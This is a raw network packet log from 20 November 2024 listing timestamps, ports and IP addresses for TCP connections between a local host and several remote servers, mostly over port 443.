                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.611462116 CET4434970640.126.32.133192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.640660048 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.641047955 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.641113997 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.697777987 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.697788000 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.697834015 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.697839975 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.781198025 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.781256914 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.781356096 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.801256895 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.801289082 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.818984032 CET4434986713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.819586992 CET49867443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.819603920 CET4434986713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.820115089 CET49867443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.820120096 CET4434986713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.867827892 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.919152975 CET4434986713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.919217110 CET4434986713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.919260025 CET4434986713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.919317007 CET49867443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.927335978 CET49872443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.957736015 CET49872443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.957740068 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.958673954 CET49872443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.958678007 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.960297108 CET4434987394.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.977283955 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.978148937 CET49877443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.978166103 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.978950024 CET49877443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.978955030 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.986543894 CET4434970640.126.32.133192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.986557961 CET4434970640.126.32.133192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.986572027 CET4434970640.126.32.133192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.986588001 CET4434970640.126.32.133192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.986602068 CET4434970640.126.32.133192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.986634970 CET49706443192.168.2.640.126.32.133
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.986637115 CET4434970640.126.32.133192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.986654997 CET4434970640.126.32.133192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.986668110 CET4434970640.126.32.133192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.986677885 CET4434970640.126.32.133192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.986689091 CET49706443192.168.2.640.126.32.133
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.986720085 CET49706443192.168.2.640.126.32.133
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.986875057 CET4434970640.126.32.133192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.986927032 CET49706443192.168.2.640.126.32.133
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.988261938 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.988778114 CET49876443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.988792896 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.989274025 CET49876443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.989276886 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.989715099 CET49867443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.989722013 CET4434986713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.989764929 CET49867443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.989769936 CET4434986713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.015707970 CET49873443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.015716076 CET4434987394.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.016957045 CET4434987394.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.016971111 CET4434987394.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.017046928 CET49873443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.027909994 CET49873443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.028007984 CET4434987394.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.028464079 CET49873443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.028471947 CET4434987394.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.057763100 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.058130026 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.058162928 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.058182955 CET49872443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.058268070 CET49872443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.080553055 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.080770969 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.080826044 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.080826044 CET49877443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.080876112 CET49877443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.097718000 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.098337889 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.098421097 CET49876443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.100117922 CET49873443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.185535908 CET49872443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.185540915 CET4434987213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.196748018 CET4434987394.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.196842909 CET4434987394.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.197357893 CET49873443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.206046104 CET49877443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.206065893 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.214148998 CET49876443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.214148998 CET49876443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.214157104 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.214160919 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.274482965 CET49882443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.274494886 CET4434988213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.274559975 CET49882443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.323527098 CET49873443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.323545933 CET4434987394.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.326057911 CET49882443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.326085091 CET4434988213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.340965033 CET49883443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.341006994 CET4434988313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.341118097 CET49883443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.341384888 CET49883443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.341398954 CET4434988313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.353513002 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.353528023 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.353704929 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.361495972 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.361532927 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.361618042 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.374910116 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.374919891 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.388484955 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.388505936 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.446113110 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.482642889 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.482666969 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.483278990 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.483284950 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.530540943 CET49896443192.168.2.618.245.60.107
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.530574083 CET4434989618.245.60.107192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.530716896 CET49896443192.168.2.618.245.60.107
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.530993938 CET49896443192.168.2.618.245.60.107
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.531018019 CET4434989618.245.60.107192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.583285093 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.583353043 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.583723068 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.589466095 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.589466095 CET49881443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.589489937 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.589498997 CET4434988113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.593744993 CET49899443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.593771935 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.594155073 CET49899443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.595187902 CET49899443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.595201969 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.955907106 CET8049832185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.955961943 CET4983280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.982557058 CET4434988313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.993473053 CET49883443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.993488073 CET4434988313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.994251013 CET49883443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.994255066 CET4434988313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.000583887 CET4434988213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.001022100 CET49882443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.001049995 CET4434988213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.001707077 CET49882443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.001713037 CET4434988213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.009896040 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.010540962 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.010581970 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.011246920 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.011253119 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.032468081 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.033004045 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.033025026 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.036206007 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.036216021 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.092101097 CET4434988313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.092282057 CET4434988313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.092358112 CET49883443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.095302105 CET49883443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.095320940 CET4434988313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.095339060 CET49883443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.095345974 CET4434988313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.109078884 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.109097958 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.109163046 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.110142946 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.110153913 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.110352039 CET4434988213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.110536098 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.110783100 CET4434988213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.110821009 CET4434988213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.110827923 CET49882443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.110892057 CET49882443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.110943079 CET49882443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.110949039 CET4434988213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.110961914 CET49882443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.110965967 CET4434988213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.113763094 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.113806009 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.113816977 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.113830090 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.113876104 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.114006042 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.114013910 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.114027977 CET49884443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.114032030 CET4434988413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.115969896 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.116005898 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.116063118 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.117316961 CET49902443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.117340088 CET4434990213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.117398977 CET49902443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.117542982 CET49902443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.117556095 CET4434990213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.120595932 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.120614052 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.135181904 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.135513067 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.135580063 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.135607958 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.135623932 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.135634899 CET49885443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.135642052 CET4434988513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.146347046 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.146394968 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.146454096 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.146919012 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.146931887 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.245074034 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.286911964 CET4434989618.245.60.107192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.301949978 CET49896443192.168.2.618.245.60.107
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.301966906 CET4434989618.245.60.107192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.303611040 CET4434989618.245.60.107192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.303689957 CET49896443192.168.2.618.245.60.107
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.313920021 CET49896443192.168.2.618.245.60.107
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.314016104 CET4434989618.245.60.107192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.331382990 CET49899443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.350116014 CET49899443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.350116014 CET49899443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.350131035 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.350146055 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.447134018 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.447474957 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.447557926 CET49899443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.481400013 CET49899443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.481436968 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.481478930 CET49899443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.481486082 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.488759041 CET49896443192.168.2.618.245.60.107
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.488775015 CET4434989618.245.60.107192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.691450119 CET49896443192.168.2.618.245.60.107
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.755470991 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.771390915 CET4434990213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.771455050 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.819060087 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.832108021 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.832134008 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.832678080 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.832684994 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.833009005 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.833024979 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.833514929 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.833520889 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.835355043 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.835367918 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.835999966 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.836004019 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.836397886 CET49902443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.836410999 CET4434990213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.836771011 CET49902443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.836776018 CET4434990213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.897672892 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.897682905 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.897804022 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.901791096 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.901799917 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.930517912 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.931072950 CET4434990113.107.246.45192.168.2.6
